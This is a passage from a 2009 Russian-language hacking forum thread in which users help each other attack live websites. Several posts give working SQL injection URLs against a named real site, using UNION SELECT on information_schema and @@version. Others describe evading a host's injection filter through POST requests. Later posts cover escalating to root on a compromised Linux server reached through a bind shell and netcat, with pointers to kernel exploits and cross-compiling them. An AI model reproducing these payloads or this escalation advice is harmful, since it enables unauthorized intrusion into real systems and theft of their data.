ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6091  
Старый 19.03.2009, 22:17
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

http://www.steadygroup.com/articledetails.php?id=314+and+substring(version(), 1,1)>1

Как эту расскрутить? Тут скобки фильтруются, чтоли?
 
Ответить с цитированием

  #6092  
Старый 19.03.2009, 22:37
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Да, режет скобки (обе) и звездочки тоже (причем граммотно режет, захексенные тоже)

Так, может пригодится:

http://www.steadygroup.com/articledetails.php?id=-314+or+1=0

http://www.steadygroup.com/articledetails.php?id=-314+or+1=1

В качестве фильтра вроде # катит
 
Ответить с цитированием

  #6093  
Старый 19.03.2009, 22:42
Аватар для Byrger
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Цитата:
Сообщение от mailbrush  
http://www.steadygroup.com/articledetails.php?id=314+and+substring(version(), 1,1)>1

Как эту расскрутить? Тут скобки фильтруются, чтоли?

5 версия.... есть information_schema

PHP код:
http://www.steadygroup.com/articledetails.php?id=-314+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,TABLE_NAME,28+FROM+information_schema.tables--+ 
 
Ответить с цитированием

  #6094  
Старый 19.03.2009, 22:42
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

А что, без скобок уже скули не модно крутить?

http://www.steadygroup.com/articledetails.php?id=-314%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28--

http://www.steadygroup.com/articledetails.php?id=-314%20UNION%20SELECT%201,table_name,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28+from+information_schema.tables--
 
Ответить с цитированием

  #6095  
Старый 20.03.2009, 01:17
Аватар для ph1l1ster
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

Цитата:
Сообщение от Imperou$  
Подскажите плз сплоит под Linux 2.6.28.7, я чо то на милворме копаюсь и не могу найти... Или подойдёт любой под Linux 2.6.x ? Я просто ни разу не юзал =)
raptor_chown подойдёт (он вроде под 2.6.x)? И где можно скачать, ребяят.Отплюсую, ну оч надо.
http://www.google.com/search?hl=ru&client=opera&rls=ru&hs=OuP&num=100&q= 2.6.28+local+root+exploit&btnG=%D0%9F%D0%BE%D0%B8% D1%81%D0%BA&lr=
 
Ответить с цитированием

  #6096  
Старый 20.03.2009, 01:36
Аватар для Imperou$
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Цитата:
Сообщение от ph1l1ster  
http://www.google.com/search?hl=ru&client=opera&rls=ru&hs=OuP&num=100&q= 2.6.28+local+root+exploit&btnG=%D0%9F%D0%BE%D0%B8% D1%81%D0%BA&lr=
Ни одного под эту версию не увидел! Я гуглил по этому запросу, ничего толком не обнаружил, поэтому и спрашивал, необходим сплоит именно под версию Linux 2.6.28, или можно и 2.6.x ????
Так ничего и не вывалилось... =(
И ещё вопрос, забиндил, подконнектился неткатом, проверяю >
which gcc
выдаёт
which: no gcc in (/bin:/usr/bin)
как быть? =(
Как можно ещё поднять права до рута?

Последний раз редактировалось Imperou$; 20.03.2009 в 02:32..
 
Ответить с цитированием

  #6097  
Старый 20.03.2009, 09:18
Аватар для jangle
jangle
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879

Репутация: 5
Отправить сообщение для jangle с помощью ICQ
По умолчанию

Поищи тут http://milw0rm.com/search.php - введи в поиск Linux

http://milw0rm.com/exploits/5093

отпиши плз если получится каким сплойтом....

Цитата:
which gcc
выдаёт
which: no gcc in (/bin:/usr/bin)
как быть? =(
Как можно ещё поднять права до рута?
если нет возможности скомпелировать на этой машине сплойт - можно на другой linux'овой машине. Да и в винде можно - лишь бы все библиотеки были. Есть такой компилятор lccwin32. им можно попробовать. Потом заливаешь бинарник и исполняешь.
 
Ответить с цитированием

  #6098  
Старый 20.03.2009, 21:17
Аватар для Byrger
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Если хостер при вводе FROM перекидывает с сайту на траницу где бла бла бла вы хакер
Как можно обойти?
 
Ответить с цитированием

  #6099  
Старый 20.03.2009, 22:04
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Byrger
Не знаю как насчёт "бла бла бла вы хакер", но например СпейсВеб при реагирует на "union select from" и выбрасывает вот сюда:
http://sweb.ru/insecure

Это обходится POST, разумеется если это возможно.

Если ты о чём то другом, то нужно смотреть что именно фильтруется, пробовать POST, возможно фильтрация только с пробелом , как реагирует на регистр и т.д. Вариантов масса.
 
Ответить с цитированием

  #6100  
Старый 21.03.2009, 01:27
Аватар для Radiator
Radiator
Участник форума
Регистрация: 17.03.2009
Сообщений: 234
Провел на форуме:
1031617

Репутация: 128
По умолчанию

если открыл info.php что я могу оттуда почерпнуть для sql иньекции:

mysql
MySQL Support enabled
Active Persistent Links 0
Active Links 0
Client API version 5.0.67
MYSQL_MODULE_TYPE external
MYSQL_SOCKET /tmp/mysql.sock
MYSQL_INCLUDE -I/usr/local/include/mysql
MYSQL_LIBS -L/usr/local/lib/mysql -lmysqlclient
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ